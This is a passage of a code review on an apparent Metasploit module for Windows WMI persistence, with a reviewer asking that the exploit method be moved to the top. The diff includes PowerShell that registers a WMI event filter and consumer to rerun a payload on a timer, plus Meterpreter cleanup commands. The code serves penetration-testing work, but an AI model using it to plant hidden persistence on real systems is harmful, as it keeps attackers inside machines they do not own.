modules/exploits/windows/local/wmi_persistence.rb

```diff
@@ -0,0 +1,152 @@
+$consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+  end
+
+  def subscription_interval
+   command = build_payload
+   class_name = datastore['CLASSNAME']
+   callback_interval = datastore['CALLBACK_INTERVAL']
+
+"$timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"}
+$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"Select * FROM __TimerEvent WHERE TimerID = 'trigger'\"; QueryLanguage = 'WQL'}
+$consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+  end
+
+
+  def log_file(log_path = nil) # Thanks Meatballs for this
+    # Get hostname
+    host = session.session_host
+
+    # Create Filename info to be appended to downloaded files
+    filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+
+    # Create a directory for the logs
+    if log_path
+      logs = ::File.join(log_path, 'logs', 'wmi_persistence',
+      Rex::FileUtils.clean_path(host + filenameinfo))
+    else
+      logs = ::File.join(Msf::Config.log_directory, 'wmi_persistence',
+      Rex::FileUtils.clean_path(host + filenameinfo))
+    end
+
+    # Create the log directory
+    ::FileUtils.mkdir_p(logs)
+
+    # logfile name
+    logfile = ::File.join(logs, Rex::FileUtils.clean_path(host + filenameinfo) + '.rc')
+    logfile
+  end
+
+
+  def cleanup
+    name_class = datastore['CLASSNAME']
+    clean_rc = log_file()
+    clean_up_rc = ""
+    clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+    clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+    clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
+    file_local_write(clean_rc, clean_up_rc)
+    print_status("Clean up Meterpreter RC file: #{clean_rc}")
+  end
+
+
+  def exploit
```

Comment:
please move the exploit method to the top. I know it's a little nitpicky, but it really helps to always have the exploit/run method at the top of the module so you can follow the flow of the module more easily